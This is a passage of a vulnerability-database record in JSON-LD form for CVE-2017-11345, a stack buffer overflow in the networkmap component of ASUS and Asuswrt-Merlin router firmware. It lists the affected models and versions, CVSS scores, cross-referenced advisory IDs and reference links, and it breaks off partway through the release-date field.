    Stack buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by hosting a crafted device description XML document (that includes a serviceType element) at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201707-0400",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac68u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n12\\+",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.378.7177"
          },
          {
            "model": "rt-ac66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac5300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n18u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt ac1200g",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3167"
          },
          {
            "model": "rt ac1900p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac56u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n12hp",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.2943"
          },
          {
            "model": "rt ac1200gu",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.5577"
          },
          {
            "model": "rt-n12hp b1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3479"
          },
          {
            "model": "rt-ac51u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n16",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac3100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac1200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac52u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.4180"
          },
          {
            "model": "rt-ac68p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n66u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac53",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9883"
          },
          {
            "model": "rt-n12d1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac88u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-ac3200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt n12\\+ pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac58u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7485"
          },
          {
            "model": "rt-ac55u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-ac66u b1",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7743"
          },
          {
            "model": "rt-n300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt ac1200g",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt ac1200gu",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt n12+ pro",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac53",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "1.0.1.4"
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1200gu",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1200g",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac53",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt n12+ pro",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.3479"
          },
          {
            "model": "rt-n12d1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n12\\+",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n12hp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.2943"
          },
          {
            "model": "rt-ac53",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9883"
          },
          {
            "model": "rt ac1200gu",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.5577"
          },
          {
            "model": "rt n12\\+ pro",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-ac1200",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.9880"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          },
          {
            "model": "rt-n300",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt merlin",
            "version": "3.0.0.4.380.7378"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          }
        ]
      },
      "cve": "CVE-2017-11345",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2017-11345",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2017-35394",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-101758",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.8,
                "id": "CVE-2017-11345",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-11345",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-11345",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-35394",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201707-767",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-101758",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Stack buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by hosting a crafted device description XML document (that includes a serviceType element) at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-11345",
            "trust": 3.1
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2017/07/14/3",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394",
            "trust": 0.6
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-97016",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "id": "VAR-201707-0400",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          }
        ],
        "trust": 1.342782942
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:36:49.545000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://asuswrt.lostrealm.ca/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://www.openwall.com/lists/oss-security/2017/07/14/3"
          },
          {
            "trust": 1.1,
            "url": "https://asuswrt.lostrealm.ca/changelog"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11345"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11345"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101758"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005984"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-767"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11345"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-11-29T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-35394"
          },
          {
            "date": "2017-07-17T00:00:00",
